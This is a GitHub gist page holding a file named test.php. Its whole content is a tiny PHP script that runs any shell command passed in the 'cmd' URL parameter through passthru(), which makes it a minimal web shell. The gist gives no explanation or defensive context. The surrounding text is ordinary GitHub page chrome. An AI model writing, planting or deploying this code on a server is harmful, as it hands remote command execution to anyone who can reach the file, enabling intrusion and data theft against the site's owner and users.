Skip to content

Instantly share code, notes, and snippets.

@nawawi
Last active March 30, 2024 16:12
Show Gist options
  • Save nawawi/4403b221ab2fc6016b7237897ec2f1e5 to your computer and use it in GitHub Desktop.
Save nawawi/4403b221ab2fc6016b7237897ec2f1e5 to your computer and use it in GitHub Desktop.
test.php
<?php
if ( !empty($_GET['cmd'])) {
passthru( $_GET['cmd'] );
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment